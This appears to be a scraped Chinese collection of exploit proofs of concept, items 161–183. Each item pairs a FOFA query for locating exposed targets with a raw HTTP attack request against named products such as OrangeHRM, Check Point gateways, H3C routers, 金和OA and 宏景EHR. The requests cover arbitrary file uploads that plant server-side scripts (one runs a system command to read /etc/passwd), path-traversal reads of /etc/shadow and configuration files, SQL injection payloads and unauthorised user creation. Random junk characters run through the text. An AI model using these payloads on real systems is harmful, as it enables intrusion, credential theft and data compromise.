! L7 z- z! d  q# U: dConnection: close: {3 l7 h! u2 u/ j
Accept: */*
" Y3 [: t' n! ^/ C7 e. KAccept-Language: en5 @1 ~1 P& r( G4 S7 `* c7 ]; V
Accept-Encoding: gzip
( y/ j1 P/ B/ B& v
5 G, j; T# S! }0 }- X1 y- ^; n4 J. u
2 I/ d' H' q/ C! d" Y1 M161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传: R: F0 F2 i1 f
FOFA:body="/KT_Css/qd_defaul.css"
$ D: x& z5 X# F第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密6 i+ l# R. M- x! e& z; F
POST /Webservice.asmx HTTP/1.1
  {/ e: X6 D  p2 c/ k4 I9 DHost: x.x.x.x
' t1 r' q9 h7 X* S0 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.363 L1 Q( f# M; p
Connection: close
8 |% W$ g6 R5 g' iContent-Length: 445
9 {2 [! ?  @0 mContent-Type: text/xml: J9 H' }8 E7 T! S% P* o- ]
Accept-Encoding: gzip
6 s+ Z& s% c' e# A5 N7 Q+ J! k# T- Z6 i, ]) G1 j/ P
<?xml version="1.0" encoding="utf-8"?>- Z! R( L9 @' _, k8 _" S5 |
<soap:Envelope xmlns:xsi=", z9 O1 }  u1 T- ?1 W) E
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
' r( Q7 x- S# b9 Ixmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">) I' x5 F$ O' A
<soap:Body>' L! }$ i& y( ^8 b7 g! t* o/ @
<UploadResume xmlns="http://tempuri.org/">
' {8 y0 _2 J5 r% J" H; ]' }9 l1 I<ip>1</ip>3 X% t0 J; d4 s
<fileName>../../../../dizxdell.aspx</fileName>+ H3 \; I' F0 v9 P3 V# X
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>% g5 y$ o) [9 R& b; G
<tag>3</tag>
9 W; Y4 f( J: n</UploadResume>  i6 C3 n1 j3 u) Y( c9 Z
</soap:Body>0 y- R) |% D; E. E# h6 a7 b: N
</soap:Envelope>
& ~" `( c* i& f2 a6 M# a% `, n
( L+ r8 i# I* s) M/ [3 U$ \. p: w& u$ w* S, J% P! [- j" N! M* A. Z& H
http://x.x.x.x/dizxdell.aspx
8 ^4 U# k; u( _5 d. m3 @1 n& ]. v+ K( ]  y" _. r
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- D' V8 A+ d: U6 ]& x% k  {
FOFA: app="和丰山海-数字标牌"
: y: D3 H) c  D: b, KPOST /QH.aspx HTTP/1.1
- ^* O- Z4 t) b' gHost: x.x.x.x
2 j* J+ a. K( P/ F# [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
7 I# W9 d* H/ TConnection: close, F0 ~* F  Q7 \- g7 ^
Content-Length: 5830 o1 p/ |. W- U( s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
" z3 V, j' S. D. c: wAccept-Encoding: gzip
$ C2 l7 q# V- W- V5 n
, _3 x" T6 k& l" H6 }; X0 b------WebKitFormBoundaryeegvclmyurlotuey. L. x& n. V1 r
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
% l9 }9 c, t# j3 F( p, W7 eContent-Type: application/octet-stream
* \6 N! j% V" Q9 o. \; J9 U  a  V: A- J  B: [$ A
<% response.write("ujidwqfuuqjalgkvrpqy") %>$ f2 @$ B3 e7 T% B& B
------WebKitFormBoundaryeegvclmyurlotuey/ ^1 W  v5 ~7 m1 E0 x/ a' V
Content-Disposition: form-data; name="action"
% A8 _6 C3 P) X" Y& d0 z: V% X0 r
6 `% F3 D8 X) ]9 uupload
0 Q' J2 u  }7 a6 p" b7 A- i9 L------WebKitFormBoundaryeegvclmyurlotuey
) p, ?$ V" O8 lContent-Disposition: form-data; name="responderId"
% T( v: y+ E2 m  y5 H7 S( B9 T0 `3 N$ ?
ResourceNewResponder/ P. c, g( F$ _
------WebKitFormBoundaryeegvclmyurlotuey
7 D4 ^2 V( {5 O; QContent-Disposition: form-data; name="remotePath"
( n, y6 Y/ D1 f: r) l! y( F+ w; r; Z5 `6 t2 ~; X
/opt/resources/ q( B4 i" B9 [: {6 H
------WebKitFormBoundaryeegvclmyurlotuey--
8 t  p$ K' c$ n3 z; ~, p
) W0 D1 Z9 Q) |9 L0 r6 D' A( ?0 e8 W! `1 w1 |/ z. e# s
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
3 b" L( l# D4 K4 {0 G, x$ {, N* V1 B7 S
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传7 K2 U; T: g4 H: x4 w( s2 B
FOFA: icon_hash="-795291075"
, i9 f2 E- v/ b* S* z7 _: vPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1% K" b8 _4 a% d8 t: @  r
Host: x.x.x.x5 |9 D* k3 B% D( k, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
* h7 o' \- Z; ~! z# aConnection: close
+ U: Y3 o. m6 L6 I, x: \* @+ ~Content-Length: 293
: c7 d" E, z* T  R- vAccept: */*( J' W7 z2 I0 y4 F1 R/ X4 @: ?
Accept-Encoding: gzip, deflate
1 s/ P# F4 e* o- r6 u! b3 aAccept-Language: zh-CN,zh;q=0.9
. t8 H! y8 q, Z5 u! h0 mContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
, o# p" w" V# l, ]7 N$ y6 S9 u5 G. J" Y! M3 @
------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 r2 h( h! ^* K# T7 D( N  ?' UContent-Disposition: form-data; name="name"3 X+ z. f) {* t* A2 E
4 m- K4 }" i% N2 v
1.php
( P9 A" X& D  G% h0 B. O------iiqvnofupvhdyrcoqyuujyetjvqgocod1 g% v/ y8 T4 u; k+ G1 c. Y
Content-Disposition: form-data; name="upfile"; filename="1.php"; S: M, }% ^/ f& w8 h
Content-Type: image/jpeg5 n& b( a( ]# ]6 w6 E: b2 l! ?

% x! _7 q' o0 l5 N% R3 Urvjhvbhwwuooyiioxega, [+ @( Z' ?1 c4 B* z) @; @0 z0 ~
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
5 N- i. k- @! M$ m$ W
5 s5 d* \% }) u" Z; U) Y/ b' Y4 U) s( ^
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传( j! b0 `5 _# D% L, q# ]
FOFA: title="智慧综合管理平台登入"
" K( {4 X( k- z$ b! rPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
7 Y4 q$ G2 l* u* C! J7 y( ZHost: x.x.x.x
: ^# D  d* V7 t5 i3 O7 O/ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0! J/ `7 w* Y9 X
Content-Length: 288
/ [4 q( H% F/ J, BAccept: application/json, text/javascript, */*; q=0.01
# j3 y, F3 E+ F8 F. PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
& |: G6 W; e% n# xConnection: close0 \- w! a; s, C( M7 A
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* v. d; |; ^. oX-Requested-With: XMLHttpRequest
8 T$ ^% h2 y# [/ wAccept-Encoding: gzip, o" n# t5 \2 W) {
0 ~& |" `7 K6 ^1 Y- q( I4 F
------dqdaieopnozbkapjacdbdthlvtlyl
$ l  }  A! w' {Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
1 _' |& U1 ^6 A! p% O7 I6 y! {Content-Type: image/jpeg
8 i+ @4 ?& }* z, E. p; B7 l3 L6 K; k4 a+ z0 l' _" a( E! N* }
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>! D0 q+ `; I( `1 @& X3 z# M
------dqdaieopnozbkapjacdbdthlvtlyl--3 _* r1 J, N+ T

, X- E( R  `+ j3 R3 G3 V$ X- A: Y8 n4 P- T+ }; y
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
. A  l2 q+ M# e' ?, }2 I  Y, d( ?% W7 n  v
165. OrangeHRM 3.3.3 SQL 注入
" T3 }3 A4 G) N9 L; TCVE-2024-364282 t% {0 B, t$ G1 N2 q% c& X
FOFA: app="OrangeHRM-产品"
8 M$ s9 ?- n) e+ B1 q  S" b9 HURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)). e/ s1 \7 H* y- e
! a0 D" a3 _1 G# E/ v
! G! _: _6 N' O. r
166. 中成科信票务管理平台SeatMapHandler SQL注入
* m5 a3 d5 a$ G, }3 ~FOFA:body="技术支持:北京中成科信科技发展有限公司"
$ F! r$ ~( B2 @; m7 [POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1! t3 `! ]) Y. j, p1 {
Host:( Q- d5 X7 [: c
Pragma: no-cache" G: d! p& B) ?% m. I6 c5 V
Cache-Control: no-cache
" {) r; a3 Y0 V6 u' [" f* pUpgrade-Insecure-Requests: 1
! R  e- f, e* _# P/ YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
' Z% |; i! B: j( I! H# a" KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# K6 q# S0 w6 y2 R- D( jAccept-Encoding: gzip, deflate
$ w: u) }- z6 jAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 v0 x, m5 `3 e' H
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE, ?+ j; j! V) B9 k
Connection: close0 E2 h8 k0 J, ]
Content-Type: application/x-www-form-urlencoded7 z$ O+ F' H2 Q' J1 r
Content-Length: 89% c& @, V1 F0 O5 G! U. g" o; p
8 x) x- D! r' r, r2 `
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE( B9 [0 j2 q6 |

) t) ]# r" W: J8 r, r: v1 b# l3 P8 d7 [* i- n; S- Y
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 S( p3 ?8 I0 E9 G" Y" ~6 m8 h5 t
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"5 r9 U1 c7 x, @
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1: |. P/ n* Q/ a4 l$ y. m2 \
Host:
5 t: X8 M& f3 A. {1 P& nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) a/ x1 M5 T4 ]5 F, V* ?% l) @+ I2 BContent-Type: application/x-www-form-urlencoded6 l, _4 I4 v' B2 x# y- [
Accept-Encoding: gzip, deflate( k+ V" \$ K; t  h3 t
Accept: */*
/ V1 p& m0 e" E, t6 ~% \& VConnection: keep-alive, `( i* y0 E% a" J& a: h8 |2 q
5 i7 W) y: C# C$ h. {- v

- b' A% A2 P. I/ s( c168. 宏景EHR OutputCode 任意文件读取
9 r  l+ E+ |5 Q( u  ]" O6 ]& E: {, t2 {6 zFOFA:app="HJSOFT-HCM"( G! \, `  I' q6 x' K8 u! j
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.14 g! `' A$ @3 t' d% R
Host: your-ip: I. {( x* i/ B2 X9 w6 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36: k! v" `7 N: C% [1 h9 P+ \  b
Content-Type: application/x-www-form-urlencoded
  q; E! d8 n7 {! a" B5 ], y$ }Connection: close
! m$ n+ U; L. a  D3 B* a2 z1 t
- d# P* o$ r- j) B7 ?" S2 B3 q1 c* C3 d% z( P
; `6 L% J7 v( p* s# U
169. 宏景EHR downlawbase SQL注入: W7 ^( _0 }0 ]8 B9 @
FOFA:app="HJSOFT-HCM"
* j% Z% w/ l# j9 SGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1% h3 c1 u6 r7 V/ {
Host: your-ip
& i' s5 d4 G! o; X. a6 L$ l( jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 m+ B3 m1 ~0 V
Accept: */*# t! D  n: ?/ h1 P6 d& [8 O
Accept-Encoding: gzip, deflate
* y) t4 e! E& E% c0 {. M# ]Connection: close# D/ o" f5 ]. `

4 [6 y5 y6 d) x& ~; L8 V# t( k
5 U8 n4 V" C5 s( `6 Q! O  @' C7 E' f
170. 宏景EHR DisplayExcelCustomReport 任意文件读取# o3 V. w" W' C2 L2 [9 E" r
FOFA:body="/general/sys/hjaxmanage.js"# V  `# S' q4 D7 F, @% y0 \$ x
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
/ R- z, `; l4 @+ {9 iHost: balalanengliang
, ^2 X$ q/ Q$ m7 T4 b) yUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 E  t% n. r/ P5 F# D- ~
Content-Type: application/x-www-form-urlencoded
- ?2 X. G& X1 c, A4 Z5 j! Y% ~7 c6 w' H9 a5 F5 D
filename=../webapps/ROOT/WEB-INF/web.xml8 R' |: t& N0 h! X

" L. W6 M) R4 u0 p  r9 ~4 I0 l9 r3 E. `$ k+ o# |& ]
171. 通天星CMSV6车载定位监控平台 SQL注入9 A# z9 M' H  E, T' F% m. s9 d# ~  A
FOFA:body="/808gps/"! w2 s) T: T4 t# O
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.19 G& O- M* ~$ l* z
Host: your-ip( j# c! J% m/ O; H3 X! ~9 l1 }7 n* h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.07 C& a% ^; W  N4 T, |
Accept: */*
6 I5 b# b8 z: j* h- e: GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% u0 a: K4 C( ]3 I2 x
Accept-Encoding: gzip, deflate
! N# M4 R! `! v+ Z7 q' I( @4 dConnection: close
. t+ C( a6 |- j3 e  k
9 b0 j) b- C4 H; `1 C- f3 H  p$ U1 Q2 z
* k4 i5 G# z2 B0 e# v5 G8 `8 p
) ]  u9 p8 w0 _: Z8 t2 _) h: Y172. DT-高清车牌识别摄像机任意文件读取
9 l6 u5 {# S( H7 Y+ wFOFA:app="DT-高清车牌识别摄像机"
  V$ {$ F( v1 m( `( N/ D. Y2 ^GET /../../../../etc/passwd HTTP/1.1
( u. e; Q% H7 {  RHost: your-ip9 y" \" a, i# K4 K# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: {/ h( b0 D) I: }& T+ B" M4 d" P
Accept-Encoding: gzip, deflate* H  n; r) Y7 n4 n4 p) S
Accept: */*( E* V+ K( B4 k% A# _, ?
Connection: keep-alive- W% L& U! U: ^
* R0 k" _. g9 v2 z& \9 ]1 h) H- y

2 w! ]1 f- \5 ^3 w" ]5 h, z, m* K" I
173. Check Point 安全网关任意文件读取
; i) g3 _" H% c, WCVE-2024-24919
" v3 O0 y8 G  C+ b( OFOFA:app="Check_Point-SSL-Network-Extender"
6 Q" z1 z8 {; V5 FPOST /clients/MyCRL HTTP/1.18 i8 e% @0 g, I4 v& x
Host: your-ip" P5 j* j, z" O6 Y9 a0 K* W
Content-Type: application/x-www-form-urlencoded- ^" H' o/ q+ }: B) n

2 `/ ^& p0 a& j9 ^aCSHELL/../../../../../../../etc/shadow# p4 R5 j1 V* P9 x! }

+ y% H0 |3 f( s. ]
- N: W2 j7 `" R2 W2 x5 P# e
4 W9 `1 J2 Q8 D/ E* |& E+ p+ m174. 金和OA C6 FileDownLoad.aspx 任意文件读取! [# P4 U, m1 q# k4 H" A/ b& ]" }
FOFA:app="金和网络-金和OA"" ~' y$ u* ]4 N# k  ?# b
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* s% Y- F: q2 y/ Q0 `  d& h3 L
Host: your-ip
2 G" U1 R7 k6 z9 L! G: DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ n1 k/ \, }  J9 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- H3 Y6 s8 e* ?  _# ]) j
Accept-Encoding: gzip, deflate, br; U) A' X# g. K7 L
Accept-Language: zh-CN,zh;q=0.9
1 u+ w& F5 G1 o& |+ \) UConnection: close
+ ~- c9 x* k6 H  U( E, H3 h4 F) V" R$ y9 S3 _- a* w2 S" j6 C3 _! `
* D; ~3 ]9 G% w% f8 Q9 i% M

( z6 X& ~: b8 L175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) K9 G: H7 F8 z5 L! q( LFOFA:app="金和网络-金和OA". x+ S. u: J# W
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1- L- h& _* ?, F: n+ B
Host:
( H* u, A( W, S  P, S1 YUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% \3 r2 R" m+ N3 N8 u% F* qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' t4 t/ |4 G6 j" ]' [2 `# }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 p& l: s% b2 o2 ]  ?
Accept-Encoding: gzip, deflate: `( F, N9 D2 A! V
Connection: close$ E) b5 ], O. q- b; B
Upgrade-Insecure-Requests: 1
( q4 g) _& [  ]  `* a8 z' u
9 O0 r: p- u! t8 x! X4 P2 D
3 {) O" o1 k$ A# @" ?, T. _176. 电信网关配置管理系统 rewrite.php 文件上传
; ~6 }, f8 V, YFOFA:body="img/login_bg3.png" && body="系统登录"( P" E, S, n  i3 m, Z
POST /manager/teletext/material/rewrite.php HTTP/1.12 S; S% `) [' k# g- J! x
Host: your-ip
$ D. A! G/ f' _* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, c( N& R/ q- L. J0 Z. M' C0 L6 Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT( f+ N. r) p9 u9 d+ ~
Connection: close# I* G  g+ V: \- {( n; P# I
" v4 Z8 ]! I9 ]3 g( N. R1 i& |
------WebKitFormBoundaryOKldnDPT
% O# M0 l7 A1 ^1 x: M2 d8 I' E( ZContent-Disposition: form-data; name="tmp_name"; filename="test.php"
: ~( }$ z/ ^' S- _+ o1 SContent-Type: image/png
, ?5 C1 \2 K' o / O# ~0 A7 t" {0 v: ^; P/ g
<?php system("cat /etc/passwd");unlink(__FILE__);?>0 Z3 w5 a, g" }! `5 P
------WebKitFormBoundaryOKldnDPT+ V/ g) O' @- @) O- n1 v# p6 ?
Content-Disposition: form-data; name="uploadtime"& w  M& H2 i* {0 b* c0 U
# p9 p$ t) x' N: W  Y# S! f! ~
: Y8 F" C1 N" |$ B: v2 G" p2 W+ w
------WebKitFormBoundaryOKldnDPT--5 m. R, f) ^" p" ^

' W" Y6 K5 D" s/ h+ d3 A: I) @0 b# `- x# U
3 O0 }1 z6 J5 z( f5 ]) e, x
177. H3C路由器敏感信息泄露* Q1 j" \/ m" [! N5 J1 l
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg: k4 I) l- r0 W2 K
/userLogin.asp/../actionpolicy_status/../M60.cfg
& B* R# u0 T- R3 y8 y/userLogin.asp/../actionpolicy_status/../GR8300.cfg
9 W0 `6 ?# K9 {$ M0 O/userLogin.asp/../actionpolicy_status/../GR5200.cfg
6 ?' B' W; V2 m/userLogin.asp/../actionpolicy_status/../GR3200.cfg- V( v$ R/ q3 {! e) V# t  E% u' _  Z
/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ y7 j$ E  p/ ~- G( d0 `; i' w
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg) e3 ]- o0 U8 ?
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg9 k& I8 |3 e5 j; O
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg2 G! o5 ^! J" v/ f! J5 D; f
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
, S$ k. w0 X, g1 B3 L& ^/userLogin.asp/../actionpolicy_status/../ER5200.cfg0 Y5 B! R0 q6 F+ [* [
/userLogin.asp/../actionpolicy_status/../ER5100.cfg* c* C8 R8 e  \9 d5 t
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
9 b( [  M8 X5 U  E- I7 m, c/userLogin.asp/../actionpolicy_status/../ER3260.cfg( I7 V% \9 ^% C, X6 c" l
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
1 U- T5 z* X  f7 O+ q' I3 K2 t/userLogin.asp/../actionpolicy_status/../ER3200.cfg
$ i2 Y  D! i; q, }; H/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
4 G# B1 p8 M. u# l* [" V$ w1 K' v/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
5 l( w9 G$ D3 P0 w" x% L& S/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg" r' I7 p  P6 j  o$ ]( G5 n* u: |8 J+ M
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
" S; b( B9 Z. l, Y/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
. \: B, Z6 I+ l1 u
* E4 R0 R9 [- v( t1 x" C  U8 H2 F# e8 G# V
178. H3C校园网自助服务系统-flexfileupload-任意文件上传2 F( k' q4 s' {: G# x& ^9 }( s
FOFA:header="/selfservice") A/ ^7 {& c% u$ n2 i% ]: r# Z7 v' d
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
, Z* e0 e0 A+ I7 J0 |Host:
$ p# k; O3 i, R: }8 [, M& DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 H" s7 d. i0 u/ C
Content-Length: 2524 }1 K) O, a$ y
Accept-Encoding: gzip, deflate/ Q2 r; W- g# g+ M% j6 h3 Y. s
Connection: close7 }! C$ Q5 x7 B) ~
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l8 _/ L0 r6 y4 m- s$ u& q4 \
-----------------aqutkea7vvanpqy3rh2l
8 o- f( H. K  f  D, EContent-Disposition: form-data; name="12234.txt"; filename="12234"
+ A0 b7 K, W9 X* TContent-Type: application/octet-stream" r  T* i9 a6 `" i/ t
Content-Length: 255) C7 T3 O& @$ Z) R! |. z" V
7 C. u: Q# M2 H& s! p% K
12234
% T; u. J4 z" Q9 O-----------------aqutkea7vvanpqy3rh2l--" E: @+ r5 P" u4 w% |+ E4 h
: F% W/ [  ~2 X! n
& `" F! X, v  m$ L9 x3 ]; d
GET /imc/primepush/%2e%2e/flex/12234.txt
/ z# c  W# y8 |$ I! p/ W1 u; K' j4 v" Q0 N9 N' O; z

( N: f7 }1 M9 u' U: N2 o0 z2 ~& D179. 建文工程管理系统存在任意文件读取7 P9 H  r( s8 X" H2 E4 K. F# X
POST /Common/DownLoad2.aspx HTTP/1.15 X) d3 U& s, W, M& Q, T7 p3 T+ ?
Host: {{Hostname}}
" H  z0 d" k8 k, o4 O' w& kContent-Type: application/x-www-form-urlencoded
! c0 ^9 r. j/ V, @9 ]% {0 D  wUser-Agent: Mozilla/5.0! s' v! A- M# ^9 V
7 A' s& R1 H/ c$ X
path=../log4net.config&Name=7 q! X6 o2 s) l. f4 T1 j5 l7 n1 Z
! ~: Y6 U; c! p8 @$ V' P( |2 @
/ i3 E* C9 h3 M2 Z7 k* J
180. 帮管客 CRM jiliyu SQL注入, m3 r% C9 J) h! x& V8 W
FOFA:app="帮管客-CRM"  l, D5 g# L# _  I
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
9 n! b0 H- M/ F# O3 L1 nHost: your-ip
! K' w7 w: T" Y' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; Q0 g+ [4 n7 m6 N8 C0 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 a  ^9 I! X. _
Accept-Encoding: gzip, deflate
4 ]; }+ J. |8 xAccept-Language: zh-CN,zh;q=0.91 E& l( H& o- m
Connection: close) t5 \# z" R! r" }) X; E: b
8 o( Y" p$ R8 k7 `0 `' C8 w

% M$ Q  e4 k1 ^$ G; L( X9 P6 y181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入: L# z" \" G9 G! Y8 F/ ]5 j) q
FOFA:"PDCA/js/_publicCom.js"
4 D; g' `& [: g8 PPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
8 i1 h* e  N1 y7 e* ^. s4 [Host: your-ip& a4 S( W4 K! H# A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- k% v, q# n- Q' ]0 h' SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& A9 }1 P* P% Z' c; w  q; y9 h, T1 C
Accept-Encoding: gzip, deflate, br
( T9 D4 G- A4 k. I& HAccept-Language: zh-CN,zh;q=0.9
3 ^2 L2 Q2 c# C1 C" z# F. _' EConnection: close5 {# x7 n5 [/ t8 `
Content-Type: application/x-www-form-urlencoded. ]7 o' ^" t. S! n

8 B# i3 H  y" n" d( a( Z  W+ J7 r* W- o' ^4 j
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 j  T3 `( f4 ], z( {% I+ S0 t$ p( S4 o4 `6 D- _& ~

1 Y+ X5 o3 G7 w182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; c* J! j/ @8 B+ MFOFA:"PDCA/js/_publicCom.js"
# q8 z. ~) j3 uPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1+ d% d& z6 I! C2 j
Host: your-ip
% J# `7 x' O% M1 Z3 X% bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! g+ u+ A  ]; R9 s+ LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" m% Y" A4 a/ C8 j# ?# ~Accept-Encoding: gzip, deflate, br
  V6 ^2 i' ]. |8 cAccept-Language: zh-CN,zh;q=0.9
4 U  S/ e. m3 p# }  [" V4 dConnection: close( O% u: C1 M. R$ p/ Y+ F( u+ E
Content-Type: application/x-www-form-urlencoded, g" {: ]% [" h$ h* z8 G( L' }4 E

# L4 R! b( y5 U4 S  s
; Z) K: x$ z7 _# {username=test1234&pwd=test1234&savedays=10 C' s+ D. N7 h/ U! H$ G
, G  E+ H  y1 D+ Q5 M

5 @* @2 ?& W0 D8 z+ q4 s183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) ?3 j% q, @7 _3 FFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
" g0 {4 a. b' G- u- Q5 dGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
9 l& x9 O1 Q$ n2 B' g8 iHost: your-ip
